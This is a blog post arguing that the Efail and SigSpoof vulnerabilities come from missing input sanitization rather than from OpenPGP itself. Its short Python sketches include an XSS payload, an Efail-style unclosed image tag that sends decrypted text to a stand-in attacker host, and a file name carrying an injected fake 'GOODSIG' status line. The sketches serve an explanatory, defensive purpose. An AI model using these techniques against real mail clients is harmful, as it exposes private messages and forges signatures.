I consider OpenPGP a blessing. It brings to the common developer a cryptography standard that leverages a series of proven techniques and algorithms. It provides a solid way of encrypting text or bytes, and of exchanging data securely.
Yet two critical flaws surfaced recently, in the space of a month. Efail gave attackers access to encrypted content, and was considered so serious that the Electronic Frontier Foundation itself advised users to stop using PGP-based email encryption. The SigSpoof flaw, on the other hand, opened a way for attackers to spoof the signature of an encrypted message’s sender.
These two discoveries are obviously not good news. Does it mean that you cannot trust OpenPGP anymore?
Mens sana in corpore sano
While building experience as a coder, I gradually became conscious of security concerns. I now try to protect applications as well as I can: decent authentication, role-based authorization, CORS, CSRF, etc. I’m certainly no expert, but I try to “do the right thing”, as they say.
One important security practice is input validation. Its absence is one of the causes of cross-site scripting, which attackers keep on leveraging according to OWASP’s report on Top Ten Risks in 2017. As a matter of fact, the sanitization problem goes back at least to 2004!
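To make this concrete, here is the kind of output-escaping step that defuses the simplest form of cross-site scripting. This is a minimal Python sketch with a hypothetical payload, using the standard library’s `html.escape`:

```python
import html

# Attacker-controlled input that would execute if echoed into a page verbatim.
user_input = '<script>alert("xss")</script>'

# Escaping turns markup-significant characters into harmless entities,
# so the browser renders the payload as text instead of executing it.
safe = html.escape(user_input)
print(safe)  # &lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;
```

Escaping on output is only one layer, of course; validating input on the way in is just as important.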
If we take a closer look at those PGP vulnerabilities, we can see that OpenPGP is not really to blame.
Efail relies on the way email clients render the HTML content of encrypted messages. Graham Cluley does a great job at explaining this. Essentially, the attacker adds an unclosed image tag right before the encrypted message. That image tag contains the attacker’s extraction URL. The client decrypts the PGP content, then renders the email’s HTML. The unclosed image tag calls the extraction URL, to which the unencrypted message is concatenated. This effectively sends the message to the attacker’s website.
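The mechanics can be sketched in a few lines. This is a simplified illustration, not an actual exploit: the domain `attacker.example`, the plaintext, and the naive string rendering are all hypothetical stand-ins for what a vulnerable HTML renderer would do:

```python
# The attacker's part of the email: an image tag whose src attribute is
# deliberately left unclosed (no closing quote or bracket).
attacker_part = '<img src="https://attacker.example/steal?msg='

# The plaintext that the client just decrypted, sitting right after it.
decrypted_part = "meet me at noon"

# Whatever follows eventually closes the attribute.
closing_part = '">'

rendered = attacker_part + decrypted_part + closing_part

# A naive renderer parses this as one image tag and fetches its src URL,
# which now carries the plaintext to the attacker's server.
leaked_url = rendered.split('src="')[1].split('"')[0]
print(leaked_url)  # https://attacker.example/steal?msg=meet me at noon
```

The point is that the leak happens entirely in the rendering layer, after OpenPGP has done its job correctly.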
OpenPGP allows a signed or encrypted message to include the name of the original, unencrypted file. GnuPG, on decrypting the message, can display a notice that includes that file name. But it doesn’t sanitize it! So an attacker can use that to inject control characters or change parts of the output.
Now, programs such as Enigmail can ask GnuPG to generate “status messages”. They can then parse those to display valuable information… such as a signature’s validity. But an attacker could change that signature information by injecting the right characters into the notice’s file name. Essentially, this is how SigSpoof is possible.
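The missing sanitization step is small. Here is a minimal Python sketch of the idea, assuming a hypothetical `sanitize_filename` helper (this is not GnuPG’s actual patch, and the injected line is a simplified stand-in for the kind of status line a mail plugin parses):

```python
import re

def sanitize_filename(name: str) -> str:
    """Strip ASCII control characters (newlines, ESC, etc.) from an
    untrusted file name before echoing it into log or status output.
    Hypothetical helper for illustration only."""
    return re.sub(r"[\x00-\x1f\x7f]", "", name)

# An attacker-chosen file name that tries to inject a fake status line
# claiming a valid signature:
malicious = "report.txt\n[GNUPG:] GOODSIG DEADBEEF Alice <alice@example.org>"

cleaned = sanitize_filename(malicious)
print(cleaned)
# Without the embedded newline, the injected text can no longer be
# mistaken for a separate, genuine status line by a line-based parser.
```

One unescaped newline is all it takes; stripping control characters from anything attacker-controlled closes the door.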
OpenPGP is not broken
Relax! The good news is: the OpenPGP standard is not broken. The bad news? The coverage given to these vulnerabilities is giving OpenPGP a bad name, even though neither the standard nor its algorithms are to blame.
In other words: the fact that these flaws stem from missing input sanitization, not from the cryptography, does not matter. At the moment, many may believe that the encryption standard is unreliable. Just have a look at these comments…
One friend of mine put it this way: use OpenPGP because it’s secure. Just don’t use that as a marketing argument…
Open Source saved the day
Some of the criticisms I’ve read blame the development model: “Based on those two vulnerabilities, it looks like Open Source is no better than closed source”.
Well, I find that a tough sell: I’d rather know there’s a problem than be unaware of it! With Open Source, developers expose issues and publish them for all to see. That may give a bad impression, but it also means that project contributors can fix those bugs as fast as possible. With closed source, only the software owner knows, and decides if and when it is worth fixing. This implies that you need to trust that vendor!
Take Toyota, for example. In 2014, the carmaker disclosed an issue with a braking system and recalled 1.6 million vehicles. People found that worrying. I thought it was reassuring: had I owned a Toyota, would I have been happier to have those brakes fixed, or to wait for them to eventually fail at the worst possible moment?
Security is hard!
Let me repeat this: security is hard.
I would not dare blame anyone for those vulnerabilities. Programmers work extra unpaid hours to build those Open Source applications, so they understandably make mistakes. I myself plead guilty to countless stupid errors and omissions in my code!
But we can adopt a set of reasonable approaches to secure our applications. We can implement multiple security layers, in case one of them fails. We can assume that all of those layers can fail, and take measures to limit how much data our software leaks.
And of course we can keep our security knowledge updated by reading security blogs and bookmarking that OWASP website 😉